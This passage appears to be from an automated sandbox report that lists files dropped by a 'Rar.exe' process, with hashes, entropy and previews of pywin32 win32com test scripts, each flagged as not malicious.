                                                                                                                                                                                                                                  SSDEEP:24:VcGwh5Af74nk7flVn5woodznnTJR39tRnM8Wvt1ubghpz5GNaZW6:VcJBnkzz5rohnTzDRM88/5xl
                                                                                                                                                                                                                                  MD5:9911ADB1E23A413CCB564455420234EC
                                                                                                                                                                                                                                  SHA1:EF1E01991BFD2200D00F79363DC860510E2AF09A
                                                                                                                                                                                                                                  SHA-256:15C1BD5A8DB3B27EC9342AD24EEED80E4DB9469D43CD055810EFD5BF6CBE6AE9
                                                                                                                                                                                                                                  SHA-512:E49C4D853F16A13F6B90B6878DDB9C554494EAF389A40C12E2148D898B01ACC749BD1EE471965DC8E69B2E24F2598660B1804B7F9B18CE3250739F0CA957D2E6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Originally contributed by Stefan Schukat as part of this arbitrary-sized.# arrays patch...from win32com.client import gencache.from win32com.test import util..ZeroD = 0.OneDEmpty = [].OneD = [1, 2, 3].TwoD = [[1, 2, 3], [1, 2, 3], [1, 2, 3]]..TwoD1 = [[[1, 2, 3, 5], [1, 2, 3], [1, 2, 3]], [[1, 2, 3], [1, 2, 3], [1, 2, 3]]]..OneD1 = [[[1, 2, 3], [1, 2, 3], [1, 2, 3]], [[1, 2, 3], [1, 2, 3]]]..OneD2 = [. [1, 2, 3],. [1, 2, 3, 4, 5],. [[1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5]],.]...ThreeD = [[[1, 2, 3], [1, 2, 3], [1, 2, 3]], [[1, 2, 3], [1, 2, 3], [1, 2, 3]]]..FourD = [. [. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. ],. [. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. ],.]..LargeD = [. [[list(range(10))] * 10],.] * 512...def _normalize_array(a):. if type(a) != type(()):. return
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5802
                                                                                                                                                                                                                                  Entropy (8bit):4.851907074785958
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:d3G3yJRy++YTpkUkppL9rpI9rpsKwpWpbKYctEolEpBLdHDz:pHLvqh9G9O+KY5R5Dz
                                                                                                                                                                                                                                  MD5:40FA1C5FE65D9B6B85989F3386EE6C1A
                                                                                                                                                                                                                                  SHA1:164C2B350723BEFBCF30C8E4FF1F24F775EEF9DF
                                                                                                                                                                                                                                  SHA-256:19712D0E526A97DB0E993F5B8DC8B56B420461D06AFD68C13E02EEAF39802D8D
                                                                                                                                                                                                                                  SHA-512:0E01639DAFB636B258EF378D1803950885D7BE4E70CCFEC161B2989847558C79D53319B5AB2669AE02647BE05FFD4E33008511B6F15C8C0CCE3A3F1347E40C84
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# testClipboard.py.import unittest..import pythoncom.import win32clipboard.import win32con.import winerror.from win32com.server.exception import COMException.from win32com.server.util import NewEnum, wrap..IDataObject_Methods = """GetData GetDataHere QueryGetData. GetCanonicalFormatEtc SetData EnumFormatEtc. DAdvise DUnadvise EnumDAdvise""".split()..# A COM object implementing IDataObject used for basic testing..num_do_objects = 0...def WrapCOMObject(ob, iid=None):. return wrap(ob, iid=iid, useDispatcher=0)...class TestDataObject:. _com_interfaces_ = [pythoncom.IID_IDataObject]. _public_methods_ = IDataObject_Methods.. def __init__(self, bytesval):. global num_do_objects. num_do_objects += 1. self.bytesval = bytesval. self.supported_fe = []. for cf in (win32con.CF_TEXT, win32con.CF_UNICODETEXT):. fe = cf, None, pythoncom.DVASPECT_CONTENT, -1, pythoncom.TYMED_HGLOBAL. sel
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4443
                                                                                                                                                                                                                                  Entropy (8bit):4.674081014404411
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:P3gyH5QxTexLwTtkxaCUaBJEIiGSi6/JX4l6fMq:/6YBwTt2aCUaBJEIi3Uq
                                                                                                                                                                                                                                  MD5:E64F560B16F23A6C53CDA967891831FA
                                                                                                                                                                                                                                  SHA1:08A00EB556B98DB0CA4644CF3C9FF2365171DC1F
                                                                                                                                                                                                                                  SHA-256:CE5C7E12F648158429A63248B1F7CEF0353DD0DAB3835D11D283CFC682601E4F
                                                                                                                                                                                                                                  SHA-512:F63C3B65C4DF416A16719875F9D39B04D44AABA9B6AAA500FF47D123BAD70DC6AF21442683425EE6ED862639633DA33DF4CABF3F53152651EA527799340E3072
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# testCollections.py.#.# This code tests both the client and server side of collections.# and enumerators..#.# Also has the side effect of testing some of the PythonCOM error semantics..import sys..import pythoncom.import pywintypes.import win32com.client.import win32com.server.util.import win32com.test.util.import winerror..L = pywintypes.Unicode..import unittest..error = "collection test error"...def MakeEmptyEnum():. # create the Python enumerator object as a real COM object. o = win32com.server.util.wrap(win32com.server.util.Collection()). return win32com.client.Dispatch(o)...def MakeTestEnum():. # create a sub-collection, just to make sure it works :-). sub = win32com.server.util.wrap(. win32com.server.util.Collection(["Sub1", 2, "Sub3"]). ). # create the Python enumerator object as a real COM object. o = win32com.server.util.wrap(win32com.server.util.Collection([1, "Two", 3, sub])). return win32com.client.Dispatch(o)...def TestEnumAgainst(o, chec
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):796
                                                                                                                                                                                                                                  Entropy (8bit):4.605369687400832
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:LLiXsLrrLyrjYBixmq65rbbjUM/dYUAwIJjPp93plx5kL/pJAgWcxG/2pV7u:aXU6r2ixmt5rbbKwItp93pJC/kabpVS
                                                                                                                                                                                                                                  MD5:377110CBCCAC1A4BEC1896F9F211BA1F
                                                                                                                                                                                                                                  SHA1:66D9E60D528F263CDC2ED371B9FAB006FE78315B
                                                                                                                                                                                                                                  SHA-256:C72E60565E7928ABEBC9E775C96A7665013DD983A70AD5F0DB713ABE94D4216B
                                                                                                                                                                                                                                  SHA-512:8F1B9304C788D362C65CCB0513478386BA9B5B747F461B1AC9682FCD4299968AD2F6D4A5562A2A48D04896E485A591A41CB6A74F2A88F42AEDCFF2C74C33AE0D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import win32com.client.import win32com.server.util.import win32com.test.util...class Tester:. _public_methods_ = ["TestValue"].. def TestValue(self, v):. pass...def test_ob():. return win32com.client.Dispatch(win32com.server.util.wrap(Tester()))...class TestException(Exception):. pass...# The object we try and pass - pywin32 will call __float__ as a last resort..class BadConversions:. def __float__(self):. raise TestException()...class TestCase(win32com.test.util.TestCase):. def test_float(self):. try:. test_ob().TestValue(BadConversions()). raise Exception("Should not have worked"). except Exception as e:. assert isinstance(e, TestException)...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1732
                                                                                                                                                                                                                                  Entropy (8bit):4.841849428968686
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:4oDDywkk/NNn/7kU3A/In8elEhClR+1DPrJJ1sm:4oLkeNdjkU3A/In8QEhClRcTrJJ19
                                                                                                                                                                                                                                  MD5:D36A0521C4E65ACB2209802A99D0D3E9
                                                                                                                                                                                                                                  SHA1:6CAA0926465B940ECFFB7F381205256A54DAFE74
                                                                                                                                                                                                                                  SHA-256:FCE630DA607E58C51908FC604E86C99F83DAC990A88FC0F919899450278F845E
                                                                                                                                                                                                                                  SHA-512:73E9F5294A45EC06D1A0B2E607ECA706E4386DDE91C289F798F7CDF5ED62FD1F618139B09CEBFC21EAC45B1389C3D5570BF3D0563C7DA05D006741CC3FDA19BE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# testDCOM.usage = """\.testDCOM.py - Simple DCOM test.Usage: testDCOM.py serverName..Attempts to start the Python.Interpreter object on the named machine,.and checks that the object is indeed running remotely...Requires the named server be configured to run DCOM (using dcomcnfg.exe),.and the Python.Interpreter object installed and registered on that machine...The Python.Interpreter object must be installed on the local machine,.but no special DCOM configuration should be necessary..""".import string.import sys..# NOTE: If you configured the object locally using dcomcnfg, you could.# simple use Dispatch rather than DispatchEx..import pythoncom.import win32api.import win32com.client...def test(serverName):. if string.lower(serverName) == string.lower(win32api.GetComputerName()):. print("You must specify a remote server name, not the local machine!"). return.. # Hack to overcome a DCOM limitation. As the Python.Interpreter object. # is probably installed locally a
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1834
                                                                                                                                                                                                                                  Entropy (8bit):4.179560618402457
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:BtkkNyYBAexbbfgaYeRPKg3VqAIVqA5VFAYqA+fS:cb5exnfg6Rf3cpcoPwTq
                                                                                                                                                                                                                                  MD5:C98D7045D5C7E22E7DDD41FF4DAF859C
                                                                                                                                                                                                                                  SHA1:F9547616FE1830FE748C7585B2AE3352EEC0B240
                                                                                                                                                                                                                                  SHA-256:1BB28A2FD0A2B3861CCE11D5F9A45CBFC37BECD2EE9E8BCB05804AC4789383F6
                                                                                                                                                                                                                                  SHA-512:BF78B445ED548FEB3BAFA50D88328486E27F7B08D53409A7E83E7ACA6DAE07C6FE67DE6FB5C7EAD6DC76F619684F91368906B0360E0AA7CA5F1463016F0E8A5B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest.from datetime import datetime..import pywintypes.import win32com.client.import win32com.server.util.import win32com.test.util.from win32timezone import TimeZoneInfo...# A COM object so we can pass dates to and from the COM boundary..class Tester:. _public_methods_ = ["TestDate"].. def TestDate(self, d):. assert isinstance(d, datetime). return d...def test_ob():. return win32com.client.Dispatch(win32com.server.util.wrap(Tester()))...class TestCase(win32com.test.util.TestCase):. def check(self, d, expected=None):. if not issubclass(pywintypes.TimeType, datetime):. self.skipTest("this is testing pywintypes and datetime"). got = test_ob().TestDate(d). self.assertEqual(got, expected or d).. def testUTC(self):. self.check(. datetime(. year=2000,. month=12,. day=25,. microsecond=500000,. tzinfo=TimeZoneInfo.utc(),.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2875
                                                                                                                                                                                                                                  Entropy (8bit):4.859731215502719
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:8AEknoCYxkIhbrGksfwL/EJj6/scGKXlUZNBGE/ekq/RkqA/skzlR3JG2fsfS:bEYYxRbrGksfwL/G6/shoVAvbfsq
                                                                                                                                                                                                                                  MD5:2CA11548E2B2588FFBC3BC645B821E47
                                                                                                                                                                                                                                  SHA1:BA14915A82A76428FBA871F6A81BA9E18C83C896
                                                                                                                                                                                                                                  SHA-256:65BF6775773CFA1CBBC8D872975D44D2E91C4EFA5734BD991478ED67F1AF613B
                                                                                                                                                                                                                                  SHA-512:826F0A9B1FE496A92C04AC33C6D29C3F1826E5ED03B4F2F886D3FA99A997FF231E2B4F1F9639676A0DE9C267B27C49B3736A1054B2996BE9F03ADC63D49540A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# testDictionary.py.#.import sys.import unittest..import pythoncom.import pywintypes.import win32com.client.import win32com.server.util.import win32com.test.util.import win32timezone.import winerror...def MakeTestDictionary():. return win32com.client.Dispatch("Python.Dictionary")...def TestDictAgainst(dict, check):. for key, value in list(check.items()):. if dict(key) != value:. raise Exception(. "Indexing for '%s' gave the incorrect value - %s/%s". % (repr(key), repr(dict[key]), repr(check[key])). )...# Ensure we have the correct version registered..def Register(quiet):. import win32com.servers.dictionary. from win32com.test.util import RegisterPythonServer.. RegisterPythonServer(win32com.servers.dictionary.__file__, "Python.Dictionary")...def TestDict(quiet=None):. if quiet is None:. quiet = not "-v" in sys.argv. Register(quiet).. if not quiet:. print("Simple enum test"). dict = MakeTe
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                  Entropy (8bit):4.791868337373185
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:0LgDzTQWXwwz/LrLDHvGoKolY/Zft/ZPIlY/zft/JZlYpKo+KM:0c/T5zvHHBKo8ft1Iqftvk4
                                                                                                                                                                                                                                  MD5:4A0B181C7EB4DFE1D6AD6F9F624819E1
                                                                                                                                                                                                                                  SHA1:6119A9D849F01EF479EFDAE0D4A027AD1F6A7D49
                                                                                                                                                                                                                                  SHA-256:5EE4E64715101EFABB04C085EFBB21513B84083DB75DA382F6D55550E1886DDD
                                                                                                                                                                                                                                  SHA-512:1B6278E2DB156A17E93F56E1A5368728A7F388BCFD18A6BA5C4B16D7381F5E4DB5AA63ADDF472026CD21493517F6AA6E906ECBE1D4EA30AE99702D61D3BFD88E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:' Test Pyhon.Dictionary using VBScript - this uses.' IDispatchEx, so is an interesting test...set ob = CreateObject("Python.Dictionary").ob("hello") = "there".' Our keys are case insensitive..ob.Item("hi") = ob("HELLO")..dim ok.ok = true..if ob("hello") <> "there" then. WScript.Echo "**** The dictionary value was wrong!!". ok = false.end if..if ob("hi") <> "there" then. WScript.Echo "**** The other dictionary value was wrong!!". ok = false.end if..if ok then. WScript.Echo "VBScript has successfully tested Python.Dictionary".end if...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2804
                                                                                                                                                                                                                                  Entropy (8bit):4.742689327797385
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:pj/+4iDAuZVD0DBqo1PRtL7NZZ3BwVyPwkkh+wLwRFchp1HfnzxPR6fUw3:pj/+plYDBqOP/vNj3B1Pjkh+wLwR2p16
                                                                                                                                                                                                                                  MD5:34345C0FE1B2605EA43CA6C014CDBE25
                                                                                                                                                                                                                                  SHA1:E879449AB2225EA74E3506FBCAA1B36B9C375B3B
                                                                                                                                                                                                                                  SHA-256:CA546589378D8261628BFAC677F08848C26BD712F758B183257C8E9879F76540
                                                                                                                                                                                                                                  SHA-512:83AD050EF1919128D7B5DC103BD5E903BF6A7F94B0D082CCE0A00E7669A0D446ECE0B070FD9F814D485ABC793D05E9B655B3203EECFF78687D3FD7B77A7AA553
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Test dynamic policy, and running object table...import pythoncom.import winerror.from win32com.server.exception import Exception..error = "testDynamic error"..iid = pythoncom.MakeIID("{b48969a0-784b-11d0-ae71-d23f56000000}")...class VeryPermissive:. def _dynamic_(self, name, lcid, wFlags, args):. if wFlags & pythoncom.DISPATCH_METHOD:. return getattr(self, name)(*args).. if wFlags & pythoncom.DISPATCH_PROPERTYGET:. try:. # to avoid problems with byref param handling, tuple results are converted to lists.. ret = self.__dict__[name]. if type(ret) == type(()):. ret = list(ret). return ret. except KeyError: # Probably a method request.. raise Exception(scode=winerror.DISP_E_MEMBERNOTFOUND).. if wFlags & (. pythoncom.DISPATCH_PROPERTYPUT | pythoncom.DISPATCH_PROPERTYPUTREF. ):. setattr(self, name, args[0]).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3352
                                                                                                                                                                                                                                  Entropy (8bit):4.652152477434712
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ijrxeSZ1OaUK0TgSWfQ6se/i64wJp4/KQ6NmWh:izoafQWrjE/KgWh
                                                                                                                                                                                                                                  MD5:2530256B7E23ED31D5DF61442F4D6FAF
                                                                                                                                                                                                                                  SHA1:BC02A5B9CA389D7C93B4295D16F65E3509D7E8A4
                                                                                                                                                                                                                                  SHA-256:B4B6A1006FE02AA541C785E98921ABF01FF70996955BCCBD8D39488CED38D1BE
                                                                                                                                                                                                                                  SHA-512:7ED2D6B06B9EE310CE72617036E992CF7029093BA0FD349B95F15DAED5D64C9B916E72B80C042B0EAD191AAC9F154DC2095CE152D5DE77EFF7445383A39B6768
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# TestExchange = Exchange Server Dump.# Note that this code uses "CDO", which is unlikely to get the best choice..# You should use the Outlook object model, or.# the win32com.mapi examples for a low-level interface...import os..import pythoncom.from win32com.client import constants, gencache..ammodule = None # was the generated module!...def GetDefaultProfileName():. import win32api. import win32con.. try:. key = win32api.RegOpenKey(. win32con.HKEY_CURRENT_USER,. "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles",. ). try:. return win32api.RegQueryValueEx(key, "DefaultProfile")[0]. finally:. key.Close(). except win32api.error:. return None...#.# Recursive dump of folders..#.def DumpFolder(folder, indent=0):. print(" " * indent, folder.Name). folders = folder.Folders. folder = folders.GetFirst(). while folder:. DumpFolder(folder, indent + 1
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4715
                                                                                                                                                                                                                                  Entropy (8bit):4.743526043842491
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:NNmAGmq5Wa/2CjYkYJtnjwA7eS9z5cjpewMAvghKtWZmEK7s3z53YJJI9g:ImqLJW7X9z2NewJvfah9g
                                                                                                                                                                                                                                  MD5:EC289A6CAA4E9C5770652DE63B75C1B1
                                                                                                                                                                                                                                  SHA1:C04C0CBDB1C5E3B97855EFC32ECAFE862D590226
                                                                                                                                                                                                                                  SHA-256:754AAE922EF48234E3445F61153F44C6AC20B0E51F5640BBC94632B7BB8D8173
                                                                                                                                                                                                                                  SHA-512:BB3FFAC5BEC93BBBFBA8675DB5BD25A0361D1EDFF74373D656659510049B3B618AC67408B66E74DE5C3F99DC4250C5532B2E9F172FB4E86B9CA27E65E2070487
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# testExplorer -..import os.import time..import pythoncom.import win32api.import win32com.client.dynamic.import win32con.import win32gui.import winerror.from win32com.client import Dispatch.from win32com.test.util import CheckClean..bVisibleEventFired = 0..# These are errors we might see when this is run in automation (eg, on github).# Not sure exactly what -2125463506 is, but google shows it's a common error.# possibly related to how IE is configured WRT site permissions etc..HRESULTS_IN_AUTOMATION = [-2125463506, winerror.MK_E_UNAVAILABLE]...class ExplorerEvents:. def OnVisible(self, visible):. global bVisibleEventFired. bVisibleEventFired = 1...def TestExplorerEvents():. global bVisibleEventFired. try:. iexplore = win32com.client.DispatchWithEvents(. "InternetExplorer.Application", ExplorerEvents. ). except pythoncom.com_error as exc:. # In automation we see this error trying to connect to events. # It's a little surpr
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4690
                                                                                                                                                                                                                                  Entropy (8bit):4.673785465015909
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:CsDGCGnLwjQDYNv9JXNKXKqGpCy/89oS/mTdLpQSpk6dISpX/BwP5w4tlz:5eLGNv93KwCCmudL7k6dISlBwBPlz
                                                                                                                                                                                                                                  MD5:0B1D6AFED5275FDD6488C6EC39512B5B
                                                                                                                                                                                                                                  SHA1:7836196313A3086090424C7DBE1CAE96BEC9E86E
                                                                                                                                                                                                                                  SHA-256:3E9F52214205CE936059D4FE3645D2A10445BB5753D55A675ABE872A399255C6
                                                                                                                                                                                                                                  SHA-512:26D96A644F92A24DF83E4722DB4B0178662B7EFC709D216C41EDA8EEEEC57F050765894BA761A8BDB77D6D1E85198418FFE1F90330CCB200F698F985AABC7CDF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Testing pasing object between multiple COM threads..Uses standard COM marshalling to pass objects between threads. Even .though Python generally seems to work when you just pass COM objects.between threads, it shouldnt...This shows the "correct" way to do it...It shows that although we create new threads to use the Python.Interpreter,.COM marshalls back all calls to that object to the main Python thread,.which must be running a message loop (as this sample does)...When this test is run in "free threaded" mode (at this stage, you must .manually mark the COM objects as "ThreadingModel=Free", or run from a .service which has marked itself as free-threaded), then no marshalling.is done, and the Python.Interpreter object start doing the "expected" thing.- ie, it reports being on the same thread as its caller!..Python.exe needs a good way to mark itself as FreeThreaded - at the moment.this is a pain in the but!.."""..import _thread.import traceback..import pythoncom.import win32api.impor
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5217
                                                                                                                                                                                                                                  Entropy (8bit):4.942059394615528
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:7cXRiARipcbmzRuBpaANS/6dFKhf3c4aQL9jn0eU/FWrqC4Yz4yWb0exmWF:YhiAs7cpaANS/6mhf35aWn0R/kjfI0sF
                                                                                                                                                                                                                                  MD5:4A8FC8A433F2A7D13360CE817289CB81
                                                                                                                                                                                                                                  SHA1:9D1C83E9F8BDB616CD1D9065967DAB4E25634064
                                                                                                                                                                                                                                  SHA-256:F30E1BA0417B24172C1FF58660AAC074DBD1C54C6EB8F8A2586DFCCA33E395EE
                                                                                                                                                                                                                                  SHA-512:0D55B08727E4A6401103701CA7E16DB3AF41228A6291BF1ADA7BB1E5D133CED59AD42E5D2E6A566D60F86AFFD682907D60E663CA7FF4FC2F8FF716E3B7D6EDD5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# The purpose of this test is to ensure that the gateways objects.# do the right thing WRT COM rules about object identity etc...# Also includes a basic test that we support inheritance correctly in.# gateway interfaces...# For our test, we create an object of type IID_IPersistStorage.# This interface derives from IPersist..# Therefore, QI's for IID_IDispatch, IID_IUnknown, IID_IPersist and.# IID_IPersistStorage should all return the same gateway object..#.# In addition, the interface should only need to declare itself as.# using the IPersistStorage interface, and as the gateway derives.# from IPersist, it should automatically be available without declaration..#.# We also create an object of type IID_I??, and perform a QI for it..# We then jump through a number of hoops, ensuring that the objects.# returned by the QIs follow all the rules..#.# Here is Gregs summary of the rules:.# 1) the set of supported interfaces is static and unchanging.# 2) symmetric: if you QI an interface for tha
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):258
                                                                                                                                                                                                                                  Entropy (8bit):4.973447807182621
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:xaLuNfJxJoYlYgbYhMYjthaYlY/3r2VlYal5WY:gUfNoYlYeYhZRUYlY/3KlYaj
                                                                                                                                                                                                                                  MD5:93C0BD59A8C2D696C823E2E5677A3614
                                                                                                                                                                                                                                  SHA1:E255BA0F245DDBB3C2BC942C1972B01739474C46
                                                                                                                                                                                                                                  SHA-256:E63B2A8041F683492E83C1FDAC3A0C94E3F6CB29CFFB54F9D97D4EB06A9A4E0A
                                                                                                                                                                                                                                  SHA-512:56C20680EB052703D3A985947E8848B902F09BE04332A841296C81CCADE0AFE1828B6E0246F198884D5909B954A1D195E0A97726C322A3420E714D538DF7173E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:set o = CreateObject("Python.Interpreter").if o.Eval("1+1") <> 2 Then..WScript.Echo "Eval('1+1') failed"..bFailed = True.end if..if bFailed then..WScript.Echo "*********** VBScript tests failed *********".else..WScript.Echo "VBScript test worked OK".end if..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4619
                                                                                                                                                                                                                                  Entropy (8bit):4.557164968331504
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:cGPxZ5eqIKLQiILEK2hLR4j8DQS02mrrXBauzSr:cGljl/DQ7rrXBvzSr
                                                                                                                                                                                                                                  MD5:D6E43ABD662B3698AF48DF23BAF33ACF
                                                                                                                                                                                                                                  SHA1:9E81C3AA827555EAD43216D9815A8DE106B49452
                                                                                                                                                                                                                                  SHA-256:86CCF25000C05F5BFA6A3EC489408370976244B302C545B8C9DDFF982BF38E25
                                                                                                                                                                                                                                  SHA-512:10F067B8B42BEFB3559669C745CC2EF2392ED342E96FBC3CADFD642A603EEA0E3E7B63376D7FE7EA0A3FE065DF84B82C569B48FFBF40B7776C65397DF30786CE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Some raw iter tests. Some "high-level" iterator tests can be found in.# testvb.py and testOutlook.py.import sys.import unittest..import pythoncom.import win32com.server.util.import win32com.test.util.from win32com.client import Dispatch.from win32com.client.gencache import EnsureDispatch...class _BaseTestCase(win32com.test.util.TestCase):. def test_enumvariant_vb(self):. ob, iter = self.iter_factory(). got = []. for v in iter:. got.append(v). self.assertEqual(got, self.expected_data).. def test_yield(self):. ob, i = self.iter_factory(). got = []. for v in iter(i):. got.append(v). self.assertEqual(got, self.expected_data).. def _do_test_nonenum(self, object):. try:. for i in object:. pass. self.fail("Could iterate over a non-iterable object"). except TypeError:. pass # this is expected.. self.assertRaises(TypeError, iter, object)
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6086
                                                                                                                                                                                                                                  Entropy (8bit):4.821038674490074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:v3vSFVg06AFunmltsBlFcg7NC8On0m8dh/pfysJn165OLxLcQmUFAz4dMl4HXOHk:ybFDumSzcqNCplsfysOOLlcQmUiz4d0Y
                                                                                                                                                                                                                                  MD5:BE75D074D20E8CE52BE10E0CE63DC5B1
                                                                                                                                                                                                                                  SHA1:A408EBA472244E2676068A111155E3AB0FBA53CF
                                                                                                                                                                                                                                  SHA-256:7D7BCDD7AA21E9CC2F474B290FBFACE2B75C8A6FE7E727A2C25B11E218955DE3
                                                                                                                                                                                                                                  SHA-512:21F8DA2372D9A6F5E35CBE923CEA66F2371053421C79478CECA1A119DDEFF0901281FCC4696FC5FDD1E336B06D56C5F58C9600B9E39A8B23DFC06CFBD2AAB2D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Test MSOffice.#.# Main purpose of test is to ensure that Dynamic COM objects.# work as expected...# Assumes Word and Excel installed on your machine...import traceback..import pythoncom.import win32api.import win32com.import win32com.client.dynamic.from pywintypes import Unicode.from win32com.client import gencache.from win32com.test.util import CheckClean..error = "MSOffice test error"...# Test a few of the MSOffice components..def TestWord():. # Try and load the object exposed by Word 8. # Office 97 - _totally_ different object model!. try:. # NOTE - using "client.Dispatch" would return an msword8.py instance!. print("Starting Word 8 for dynamic test"). word = win32com.client.dynamic.Dispatch("Word.Application"). TestWord8(word).. word = None. # Now we will test Dispatch without the new "lazy" capabilities. print("Starting Word 8 for non-lazy dynamic test"). dispatch = win32com.client.dynamic._GetGoodDispatch("Word.Ap
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3982
                                                                                                                                                                                                                                  Entropy (8bit):4.479543856143631
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ZOmeajyzPZjpBgJAIhEukjLTWnb8Zh/3dHmjX:Z+7ZjpKJA4EumTWIH3pmjX
                                                                                                                                                                                                                                  MD5:E75E0A1472926AF4457460CFCB356166
